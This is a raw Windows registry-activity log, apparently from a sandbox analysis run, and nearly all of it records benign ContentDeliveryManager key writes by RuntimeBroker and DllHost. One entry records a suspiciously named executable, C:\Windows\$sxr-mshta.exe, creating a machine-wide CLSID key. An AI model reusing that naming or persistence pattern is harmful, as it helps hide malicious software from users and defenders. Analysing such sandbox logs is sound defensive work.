Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e477b35fe1b0da018c12ef5fe1b0da018c12ef5fe1b0da010abf09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebc58894bbc58894b2e00000000000000000000000000000000000000000000000000d0db2600350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f8f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f8f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db3e2a0dfacd9c43e7636fedbdb46e65f90a7e290d4e40fa97f28ce82e35f6dd" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = b2be7d5fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000dca17c5fe1b0da01dca17c5fe1b0da01dca17c5fe1b0da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000376564313135353665303736316236653037363462646233396130373766636439666261616136336361343665303762383062356635666161346435393563340000b20009000400efbebc58894bbc58894b2e0000000000000000000000000000000000000000000000000024032e00370065006400310031003500350036006500300037003600310062003600650030003700360034006200640062003300390061003000370037006600630064003900660062006100610061003600330063006100340036006500300037006200380030006200350066003500660061006100340064003500390035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37656431313535366530373631623665303736346264623339613037376663643966626161613633636134366530376238306235663566616134643539356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f3f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f3f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = d6d8845fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "INetHistory\\BackgroundTransferApiGroup" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = b9c6835fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000030c9835fe1b0da0130c9835fe1b0da0130c9835fe1b0da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebc58894bbc58894b2e00000000000000000000000000000000000000000000000000d0db2600350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f4f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f4f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = 4c603260e1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = 9123625fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000aac7a25fe1b0da01c7fefa5fe1b0da01c7fefa5fe1b0da01e25606000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbebc58894bbc58894b2e0000000000000000000000000000000000000000000000000052014d00640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f7f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f7f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
